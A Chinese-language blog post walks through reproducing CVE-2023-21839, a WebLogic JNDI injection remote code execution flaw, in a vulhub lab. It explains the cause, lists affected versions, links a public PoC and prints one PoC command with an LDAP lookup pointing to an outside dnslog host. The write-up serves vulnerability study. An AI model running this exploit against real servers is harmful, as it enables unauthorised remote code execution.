🗒️WebLogic远程加载类RCE漏洞
2023-8-21
| 2023-10-29
字数 624阅读时长 2 分钟
type
status
date
slug
summary
tags
category
icon
password
😀
CVE-2023-21839是一个weblogic的JNDI注入漏洞。由于Weblogic t3/iiop协议支持远程绑定对象bind到服务端,并且可以通过lookup查看,当远程对象继承自OpaqueReference时,lookup查看远程对象,服务端会调用远程对象getReferent方法。weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并且实现了getReferent方法,并且存在retVal = context.lookup(this.remoteJNDIName)实现,故可以通过rmi/ldap远程协议进行远程命令执行。

一、漏洞环境

  1. vulhub环境
  1. go环境(用于poc)
notion image
poc链接:https://github.com/4ra1n/CVE-2023-21839
本PoC是针对CVE-2023-21839编写的,实际上同时覆盖了CVE-2023-21931和CVE-2023-21979。因为这三个漏洞触发机制相同,且补丁方式相同,所以只要存在一个,那么其他两个也存在。

二、影响范围

weblogic_server = 12.2.1.3.0 weblogic_server = 12.2.1.4.0 weblogic_server = 14.1.1.1.0

三、复现过程

进入vulhub/weblogic/CVE-2023-21839
使用docker-compose up -d构建环境
notion image
进入github poc的cmd文件夹生成poc
notion image
chmod加权后运行poc
/CVE-2023-21839 -ip 192.168.245.131 -port 7001 -ldap ldap://cg38x0.dnslog.cn/evil
notion image
notion image
 
  • 漏洞复现
  • HW漏洞复现-安恒明御运维审计与风险控制系统HW第一天wps 0day复现
    Loading...